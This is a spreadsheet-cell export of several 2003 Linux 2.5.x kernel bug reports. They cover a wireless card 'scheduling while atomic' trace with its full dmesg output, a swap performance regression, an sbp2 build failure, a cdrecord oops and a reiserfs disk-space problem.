    <t>Distribution: Gentoo 1.4 rc2 Hardware Environment: IBM A30 Laptop, attaching various HW information. Software Environment: Linux bith.gbg.pa.pulsen 2.5.74 #1 Tue Jul 8 09:41:47 CEST 2003 i686 Intel(R) Pentium(R) III Mobile CPU 1000MHz GenuineIntel GNU/Linux Gnu C 3.2.2 Gnu make 3.80 util-linux 2.11z mount 2.11z e2fsprogs 1.33 pcmcia-cs 3.2.1 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.9 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0.15 Modules Loaded radeon ds snd_pcm_oss snd_mixer_oss snd_intel8x0 snd_ac97_codec snd_pcm snd_timer snd_page_alloc snd_mpu401_uart snd_rawmidi snd soundcore apm yenta_socket pcmcia_core hid mousedev Problem Description: If I boot with my Cisco Aironet 350 in the machine the kernel will print a trace with "Bad scheduling while atomic" messages, see output from dmesg below. It will however work. If I start ethereal and use the newly created eth1 as a capture interface the machine will hang hard and I have to reboot(etheral tries to set the card in promiscous mode). Output from dmesg with card attached to computer while booting: Linux version 2.5.74 (root@bith.gbg.pa.pulsen) (gcc version 3.2.2) #1 Tue Jul 8 09:41:47 CEST 2003 Video mode to be used for restore is f00 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009f000 (usable) BIOS-e820: 000000000009f000 - 00000000000a0000 (reserved) BIOS-e820: 00000000000dc000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000003ff60000 (usable) BIOS-e820: 000000003ff60000 - 000000003ff7a000 (ACPI data) BIOS-e820: 000000003ff7a000 - 000000003ff7c000 (ACPI NVS) BIOS-e820: 000000003ff7c000 - 0000000040000000 (reserved) BIOS-e820: 00000000ff800000 - 0000000100000000 (reserved) 127MB HIGHMEM available. 896MB LOWMEM available. On node 0 totalpages: 261984 DMA zone: 4096 pages, LIFO batch:1 Normal zone: 225280 pages, LIFO batch:16 HighMem zone: 32608 pages, LIFO batch:7 IBM machine detected. Enabling interrupts during APM calls. IBM machine detected. Disabling SMBus accesses. ACPI: RSDP (v002 IBM ) @ 0x000f73d0 ACPI: XSDT (v001 IBM TP-1E 00000.04147) @ 0x3ff6f242 ACPI: FADT (v001 IBM TP-1E 00000.04147) @ 0x3ff6f286 ACPI: SSDT (v001 IBM TP-1E 00000.04147) @ 0x3ff6f33a ACPI: ECDT (v001 IBM TP-1E 00000.04147) @ 0x3ff79f87 ACPI: BOOT (v001 IBM TP-1E 00000.04147) @ 0x3ff79fd8 ACPI: DSDT (v001 IBM TP-1E 00000.04147) @ 0x00000000 ACPI: BIOS passes blacklist Building zonelist for node : 0 Kernel command line: root=/dev/hda3 Initializing CPU#0 PID hash table entries: 4096 (order 12: 32768 bytes) Detected 999.206 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 1978.36 BogoMIPS Memory: 1034060k/1047936k available (1682k kernel code, 12944k reserved, 529k data, 120k init, 130432k highmem) Dentry cache hash table entries: 131072 (order: 7, 524288 bytes) Inode-cache hash table entries: 65536 (order: 6, 262144 bytes) Mount-cache hash table entries: 512 (order: 0, 4096 bytes) -&gt; /dev -&gt; /dev/console -&gt; /root CPU: L1 I cache: 16K, L1 D cache: 16K CPU: L2 cache: 512K CPU: After generic, caps: 0383f9ff 00000000 00000000 00000040 Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: Intel(R) Pentium(R) III Mobile CPU 1000MHz stepping 01 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX Initializing RT netlink socket PCI: PCI BIOS revision 2.10 entry at 0xfd8fe, last bus=8 PCI: Using configuration type 1 mtrr: v2.0 (20020519) BIO: pool of 256 setup, 14Kb (56 bytes/bio) biovec pool[0]: 1 bvecs: 256 entries (12 bytes) biovec pool[1]: 4 bvecs: 256 entries (48 bytes) biovec pool[2]: 16 bvecs: 256 entries (192 bytes) biovec pool[3]: 64 bvecs: 256 entries (768 bytes) biovec pool[4]: 128 bvecs: 256 entries (1536 bytes) biovec pool[5]: 256 bvecs: 256 entries (3072 bytes) ACPI: Subsystem revision 20030619 ACPI: Found ECDT ACPI: Could not use ECDT block request queues: 4/128 requests per read queue 4/128 requests per write queue enter congestion at 15 exit congestion at 17 drivers/usb/core/usb.c: registered new driver usbfs drivers/usb/core/usb.c: registered new driver hub ACPI: ACPI tables contain no PCI IRQ routing entries PCI: Invalid ACPI-PCI IRQ routing table PCI: Probing PCI hardware PCI: Probing PCI hardware (bus 00) Transparent bridge - Intel Corp. 82801BAM/CAM PCI Bri PCI: Discovered primary peer bus 09 [IRQ] PCI: Using IRQ router PIIX [8086/248c] at 0000:00:1f.0 PCI: IRQ 0 for device 0000:00:1f.1 doesn't match PIRQ mask - try pci=usepirqmask PCI: Found IRQ 11 for device 0000:00:1f.1 PCI: Sharing IRQ 11 with 0000:00:1d.2 pty: 256 Unix98 ptys configured SBF: Simple Boot Flag extension found and enabled. SBF: Setting boot flags 0x1 Enabling SEP on CPU 0 highmem bounce pool size: 64 pages Journalled Block Device driver loaded devfs: v1.22 (20021013) Richard Gooch (rgooch@atnf.csiro.au) devfs: boot_options: 0x1 Generic RTC Driver v1.07 Linux agpgart interface v0.100 (c) Dave Jones agpgart: Detected an Intel 830M Chipset. agpgart: Maximum main memory to use for agp memory: 941M agpgart: AGP aperture is 256M @ 0xd0000000 Floppy drive(s): fd0 is 1.44M FDC 0 is a National Semiconductor PC87306 Intel(R) PRO/100 Network Driver - version 2.3.13-k1 Copyright (c) 2003 Intel Corporation PCI: Found IRQ 11 for device 0000:02:08.0 e100: selftest OK. e100: eth0: Intel(R) PRO/100 Network Connection Hardware receive checksums enabled Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx ICH3M: IDE controller at PCI slot 0000:00:1f.1 PCI: Enabling device 0000:00:1f.1 (0005 -&gt; 0007) PCI: Found IRQ 11 for device 0000:00:1f.1 PCI: Sharing IRQ 11 with 0000:00:1d.2 ICH3M: chipset revision 1 ICH3M: not 100% native mode: will probe irqs later ide0: BM-DMA at 0x1860-0x1867, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0x1868-0x186f, BIOS settings: hdc:DMA, hdd:pio hda: IC25N030ATCS04-0, ATA DISK drive ide0 at 0x1f0-0x1f7,0x3f6 on irq 14 hdc: MATSHITADVD-ROM SR-8176, ATAPI CD/DVD-ROM drive ide1 at 0x170-0x177,0x376 on irq 15 hda: max request size: 128KiB hda: host protected area =&gt; 1 hda: 58605120 sectors (30006 MB) w/1768KiB Cache, CHS=62016/15/63, UDMA(100) /dev/ide/host0/bus0/target0/lun0: p1 p2 p3 hdc: ATAPI 24X DVD-ROM drive, 256kB Cache, UDMA(33) Uniform CD-ROM driver Revision: 3.12 drivers/usb/host/uhci-hcd.c: USB Universal Host Controller Interface driver v2.1 PCI: Found IRQ 11 for device 0000:00:1d.0 PCI: Sharing IRQ 11 with 0000:01:00.0 PCI: Sharing IRQ 11 with 0000:02:00.0 PCI: Setting latency timer of device 0000:00:1d.0 to 64 uhci-hcd 0000:00:1d.0: Intel Corp. 82801CA/CAM USB (Hub uhci-hcd 0000:00:1d.0: irq 11, io base 00001800 Please use the 'usbfs' filetype instead, the 'usbdevfs' name is deprecated. uhci-hcd 0000:00:1d.0: new USB bus registered, assigned bus number 1 hub 1-0:0: USB hub found hub 1-0:0: 2 ports detected PCI: Found IRQ 11 for device 0000:00:1d.1 PCI: Setting latency timer of device 0000:00:1d.1 to 64 uhci-hcd 0000:00:1d.1: Intel Corp. 82801CA/CAM USB (Hub uhci-hcd 0000:00:1d.1: irq 11, io base 00001820 uhci-hcd 0000:00:1d.1: new USB bus registered, assigned bus number 2 hub 2-0:0: USB hub found hub 2-0:0: 2 ports detected PCI: Found IRQ 11 for device 0000:00:1d.2 PCI: Sharing IRQ 11 with 0000:00:1f.1 PCI: Setting latency timer of device 0000:00:1d.2 to 64 uhci-hcd 0000:00:1d.2: Intel Corp. 82801CA/CAM USB (Hub uhci-hcd 0000:00:1d.2: irq 11, io base 00001840 uhci-hcd 0000:00:1d.2: new USB bus registered, assigned bus number 3 hub 3-0:0: USB hub found hub 3-0:0: 2 ports detected input: PS/2 Generic Mouse on isa0060/serio1 serio: i8042 AUX port at 0x60,0x64 irq 12 input: AT Set 2 keyboard on isa0060/serio0 serio: i8042 KBD port at 0x60,0x64 irq 1 NET4: Linux TCP/IP 1.0 for NET4.0 IP: routing cache hash table of 8192 buckets, 64Kbytes TCP: Hash tables configured (established 262144 bind 65536) NET4: Unix domain sockets 1.0/SMP for Linux NET4.0. EXT3-fs: INFO: recovery required on readonly filesystem. EXT3-fs: write access will be enabled during recovery. kjournald starting. Commit interval 5 seconds EXT3-fs: hda3: orphan cleanup on readonly fs ext3_orphan_cleanup: deleting unreferenced inode 964794 ext3_orphan_cleanup: deleting unreferenced inode 964793 EXT3-fs: hda3: 2 orphan inodes deleted EXT3-fs: recovery complete. EXT3-fs: mounted filesystem with ordered data mode. VFS: Mounted root (ext3 filesystem) readonly. Mounted devfs on /dev Freeing unused kernel memory: 120k freed Adding 491392k swap on /dev/hda2. Priority:-1 extents:1 EXT3 FS on hda3, internal journal mice: PS/2 mouse device common for all mice drivers/usb/core/usb.c: registered new driver hid drivers/usb/input/hid-core.c: v2.0:USB HID core driver Linux Kernel Card Services 3.1.22 options: [pci] [cardbus] [pm] PCI: Found IRQ 11 for device 0000:02:00.0 PCI: Sharing IRQ 11 with 0000:00:1d.0 PCI: Sharing IRQ 11 with 0000:01:00.0 Yenta IRQ list 04b8, PCI irq11 Socket status: 30000410 PCI: Found IRQ 11 for device 0000:02:00.1 PCI: Sharing IRQ 11 with 0000:00:1f.3 PCI: Sharing IRQ 11 with 0000:00:1f.5 PCI: Sharing IRQ 11 with 0000:00:1f.6 Yenta IRQ list 04b8, PCI irq11 Socket status: 30000006 apm: BIOS version 1.2 Flags 0x03 (Driver version 1.16ac) PCI: Enabling device 0000:00:1f.5 (0000 -&gt; 0001) PCI: Found IRQ 11 for device 0000:00:1f.5 PCI: Sharing IRQ 11 with 0000:00:1f.3 PCI: Sharing IRQ 11 with 0000:00:1f.6 PCI: Sharing IRQ 11 with 0000:02:00.1 PCI: Setting latency timer of device 0000:00:1f.5 to 64 intel8x0: clocking to 48000 blk: queue c035f15c, I/O limit 4095Mb (mask 0xffffffff) cs: IO port probe 0x0c00-0x0cff: clean. cs: IO port probe 0x0800-0x08ff: clean. cs: IO port probe 0x0100-0x04ff: excluding 0x3c0-0x3df 0x4d0-0x4d7 cs: IO port probe 0x0a00-0x0aff: clean. cs: memory probe 0xa0000000-0xa0ffffff: clean. airo: Probing for PCI adapters airo: Finished probing for PCI adapters airo: Doing fast bap_reads airo: MAC enabled eth1 0:8:21:29:88:1b eth1: index 0x05: Vcc 5.0, Vpp 5.0, irq 3, io 0x0100-0x013f bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;c01b1b43&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c0121936&gt;] [&lt;c0130f8c&gt;] [&lt;c013205a&gt;] [&lt;c01348fe&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c0130f8c&gt;] [&lt;c013205a&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01348fe&gt;] [&lt;c0134a40&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c01780b7&gt;] [&lt;c016734f&gt;] [&lt;c0178431&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01348fe&gt;] [&lt;c0134a40&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c01780b7&gt;] [&lt;c016734f&gt;] [&lt;c0178431&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;c010b0f7&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;c01b1b43&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c0130f8c&gt;] [&lt;c013205a&gt;] [&lt;c01348fe&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0121936&gt;] [&lt;c01217a6&gt;] [&lt;c0121c10&gt;] [&lt;c0129afe&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bba0&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01348fe&gt;] [&lt;c0134a40&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c01780b7&gt;] [&lt;c016734f&gt;] [&lt;c0178431&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01348fe&gt;] [&lt;c0134a40&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c01780b7&gt;] [&lt;c016734f&gt;] [&lt;c0178431&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01348fe&gt;] [&lt;c0134a40&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c01780b7&gt;] [&lt;c016734f&gt;] [&lt;c0178431&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01348fe&gt;] [&lt;c0134a40&gt;] [&lt;c017812c&gt;] [&lt;c017812c&gt;] [&lt;c0165a5c&gt;] [&lt;c0166b16&gt;] [&lt;c01780b7&gt;] [&lt;c016734f&gt;] [&lt;c0178431&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] bad: scheduling while atomic! Call Trace: [&lt;c0116549&gt;] [&lt;f890bad0&gt;] [&lt;f890c088&gt;] [&lt;f890c130&gt;] [&lt;f8909629&gt;] [&lt;f8909c39&gt;] [&lt;c01b0e64&gt;] [&lt;c016b4c7&gt;] [&lt;c025264b&gt;] [&lt;c0252688&gt;] [&lt;c016afa2&gt;] [&lt;c014cd8e&gt;] [&lt;c014d032&gt;] [&lt;c010930b&gt;] e100: eth0 NIC Link is Up 100 Mbps Half duplex [drm] Initialized radeon 1.8.0 20020828 on minor 0 agpgart: Found an AGP 2.0 compliant device at 0000:00:00.0. agpgart: Putting AGP V2 device at 0000:00:00.0 into 1x mode agpgart: Putting AGP V2 device at 0000:01:00.0 into 1x mode PCI: Found IRQ 11 for device 0000:01:00.0 PCI: Sharing IRQ 11 with 0000:00:1d.0 PCI: Sharing IRQ 11 with 0000:02:00.0</t>
  </si>
  <si>
    <t>performance regression compared to 2.4.20 under tight RAM conditions</t>
  </si>
  <si>
    <t>2003-07-08 04:37 UTC</t>
  </si>
  <si>
    <t>Idan Sofer</t>
  </si>
  <si>
    <t>2005-11-16 14:24 UTC</t>
  </si>
  <si>
    <t>Distribution: debian unstable Hardware Environment: Pentium III 700Mhz I815E Based motherboard 64MB SDRAM 133 WD 6GB harddrive, UDMA2 Software Environment: GCC 3.3-2 glibc 2.3.1-16 Swap partition 123MB Swap file(on ext3 fs) of about 96MB Problem Description: For quite a time I had the feeling that the 2.5.x kernels perform worse than 2.4.x on my box, especially when having to do aggrassive swapping(Switching between relatively heavyweight(ram wise) applications) I considered this feeling subjective at first, however, eventually I took the time to write some benchmarking code and compare results. The code(attached) is pretty trivial, it forks, mallocs and initialize a very large bulk of memory(I used total RAM*1.5), in order to force the system to swap, and simulate two processes fighting on RAM space when there is no enough of that scared resource:-) After both processes end their work, the parent process reports on the total running time. The code was compiled using gcc 3.3 with -O2 parameter. I've done 20 iterations on each of the three kernels: Stock debian 2.4.20 (kernel-source-2.4.20-5) Stock vanilla 2.5.73 with preempt Stock vanilla 2.5.73 without preempt Result are at follows: 2.4.20 : Mean - 14.1732 Max - 16.0875 Min - 12.9977 2.5.73 : Mean - 17.1692 Max - 21.8161 Min - 15.4827 2.5.73(w/o prempt): Mean - 16.9054 Max - 19.0174 Min - 15.4137 As can be seen, the differences are quite significant, about three seconds on average, which I believe may be related to the increased swapping time I have encountered.</t>
  </si>
  <si>
    <t>Luca</t>
  </si>
  <si>
    <t>sbp2 fails to build, missing include of &lt;linux/pci.h&gt;?</t>
  </si>
  <si>
    <t>2003-07-08 22:42 UTC</t>
  </si>
  <si>
    <t>Terje Kvernes</t>
  </si>
  <si>
    <t>2003-07-15 22:16 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Linux Hardware Environment: Dell X200 laptop and a Dual PIII system. Software Environment: GCC 3.2.3 Problem Description: [x200 /usr/src/linux-2.5.74] # make modules make[1]: `arch/i386/kernel/asm-offsets.s' is up to date. CC [M] drivers/ieee1394/sbp2.o drivers/ieee1394/sbp2.c: In function `sbp2util_create_command_orb_pool': drivers/ieee1394/sbp2.c:422: warning: implicit declaration of function `pci_map_single' drivers/ieee1394/sbp2.c:424: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c:424: (Each undeclared identifier is reported only once drivers/ieee1394/sbp2.c:424: for each function it appears in.) drivers/ieee1394/sbp2.c: In function `sbp2util_remove_command_orb_pool': drivers/ieee1394/sbp2.c:454: warning: implicit declaration of function `pci_unmap_single' drivers/ieee1394/sbp2.c:456: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2util_free_command_dma': drivers/ieee1394/sbp2.c:567: warning: implicit declaration of function `pci_unmap_page' drivers/ieee1394/sbp2.c:576: warning: implicit declaration of function `pci_unmap_sg' drivers/ieee1394/sbp2.c: In function `sbp2_start_device': drivers/ieee1394/sbp2.c:817: warning: implicit declaration of function `pci_alloc_consistent' drivers/ieee1394/sbp2.c:818: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:826: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:834: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:842: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:850: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:858: warning: assignment makes pointer from integer without a cast drivers/ieee1394/sbp2.c:862: warning: implicit declaration of function `pci_free_consistent' drivers/ieee1394/sbp2.c: In function `sbp2_create_command_orb': drivers/ieee1394/sbp2.c:1837: warning: implicit declaration of function `pci_map_page' drivers/ieee1394/sbp2.c:1850: warning: implicit declaration of function `pci_map_sg' drivers/ieee1394/sbp2.c: In function `sbp2_link_orb_command': drivers/ieee1394/sbp2.c:2015: warning: implicit declaration of function `pci_dma_sync_single' drivers/ieee1394/sbp2.c:2017: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2_handle_status_write': drivers/ieee1394/sbp2.c:2447: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2scsi_complete_all_commands': drivers/ieee1394/sbp2.c:2639: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) drivers/ieee1394/sbp2.c: In function `sbp2scsi_abort': drivers/ieee1394/sbp2.c:2798: `PCI_DMA_BIDIRECTIONAL' undeclared (first use in this function) make[2]: *** [drivers/ieee1394/sbp2.o] Error 1 make[1]: *** [drivers/ieee1394] Error 2 make: *** [drivers] Error 2 Steps to reproduce: selecting to build sbp2. If I add #include &lt;linux/pci.h&gt; to drivers/ieee1394/spb2.c the module compiles fine.</t>
  </si>
  <si>
    <t>bad batch of CD-R discs causes cdrecord kernel oops</t>
  </si>
  <si>
    <t>2.5.74-bk6</t>
  </si>
  <si>
    <t>2003-07-09 00:50 UTC</t>
  </si>
  <si>
    <t>2003-07-13 17:38 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake Cooker Hardware Environment: LG GCC-4320B DVD/CD-RW combo drive Software Environment: cdrecord-2.01-0.a16.1mdk Problem Description: When I try to record ~700MB of data onto a bad batch of 700MB CD-RW discs, the recording fails near the end. Under Linux 2.5.6x (I forgot which values of x), the recording properly fails with some kind of error (again, I forget what kind). Under recent (if not all) 2.5.7x kernels, I get a kernel oops. (If it would help to find out which kernel broke this, I'll try to find out.) This bug is 100% reproducible for me. Steps to reproduce: 1. Insert a blank but known faulty TDK "48X compatible" 700MB CD-RW disc into the LG GCC-4320B drive. The drive *must* be this model, or else the errors may be intermittent and/or may not occur until you try to read the recorded disc. I have well over 70 of these discs so I can perform that many test runs. 2. Record a ~700MB CD image, such as the 2003-06-06 Knoppix snapshot. 3. A cdrecord error is expected. We get a kernel oops instead. I'm currently figuring out how to save a copy of the oops and add it to this bug report.</t>
  </si>
  <si>
    <t>The harddisk space can't be released after ltp runs if the partition is reiserfs.</t>
  </si>
  <si>
    <t>2003-07-10 19:16 UTC</t>
  </si>
  <si>
    <t>Wu Hao</t>
  </si>
  <si>
    <t>2003-07-14 01:32 UTC</t>
  </si>
  <si>
